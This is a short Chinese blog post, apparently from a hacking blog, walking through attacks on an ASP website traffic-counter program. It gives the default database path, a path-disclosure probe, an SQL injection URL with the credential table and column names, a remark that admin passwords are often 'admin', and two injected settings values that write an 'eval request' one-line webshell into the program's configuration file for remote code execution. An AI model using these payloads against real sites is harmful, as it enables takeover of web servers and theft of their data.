一、默认数据库:

counter/_db/db_CC_Counter6.mdb

也可直接打开:https://www.webshell.cc/Counter/utilities/update.asp

查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。

二、暴路径漏洞

利用探针https://www.webshell.cc/Counter/utilities/aspSysCheck.asp,查看网站路径。

三、注入

存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用。

https://www.webshell.cc/xxcount/core/default.asp?id=xxcnc

流量统计用户名是xxcnc,保存密码的表名是t_Site,用户名列是UID,密码列是PWD,登录页面(https://www.webshell.cc/xxcount/supervise/login.asp)

四、后台插马

需要进后台,可插一句拿SHELL。不过大多说管理员密码都为admin,管理员密码并未保存在数据库中,在_inc/Common.asp中。

具体:进后台在管理信箱那把

cnhacker@263.net":eval request(chr(35))//

复制过去,,点击保存,看下_inc/common.asp的内容。

WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"

嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了\"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。

另注:黑防也有人提到了类似方法,可以写成

9xiao"%><%eval request(chr(35))%><%'

,这个方法也比较巧妙,//和'在asp都是注释语句!

by 逍遥复仇

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3265.html